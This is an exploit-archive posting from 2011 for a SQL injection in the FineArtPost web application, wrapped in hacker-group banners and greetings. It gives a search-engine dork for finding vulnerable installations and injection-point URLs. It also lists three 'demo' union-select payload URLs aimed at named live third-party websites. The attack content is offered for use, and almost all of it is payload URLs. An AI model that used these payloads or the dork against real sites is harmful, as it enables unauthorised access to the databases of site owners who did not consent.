FineArtPost <= SQL injection Vulnerabelity



EKU-ID: 350 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-05-30 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |

\___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/

Exploit-ID is the Indonesian Exploit Archive

Web             : exploit-id.com

e-mail          : root[at]exploit-id.com              

                      #########################################
                       I'm Caddy-Dz ,  member from exploit-id.com

                      #########################################  
================================================================================
####
# Exploit Title: FineArtPost <= SQL injection Vulnerabelity
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google Dork: intext:"powered by FineArtPost" inurl:u_id
# Tested on: [Windows Vista Edition Intégrale]
####

||> Special Greeting To: KedAns-Dz & All Algerians Hackers

####


[*] ## ExPLo!T:

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=44&user_id=2&large=yes   /  ==> /  http://127.0.0.1/*.php?user_id=2&u_id=44[Inject Here]

http://127.0.0.1/*.php?user_id=2&u_id=[SQLI]

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=[SQLI]


####


[*]## Demo:

http://www.artisanwoodsgallery.com/public/display_images.php?user_id=2&u_id=-44%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.fineartpost.com/zaluchapost/public/display_images.php?u_id=-193%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.mcaseyart.com/public/view_text.php?t_id=7&u_id=-36%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

####

Peace From Algeria

####

||> Exploit-id will not die

=================================**Algerians Hackers**=======================================
# Greets To :
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  (exploit-id.com)
  (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
   MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================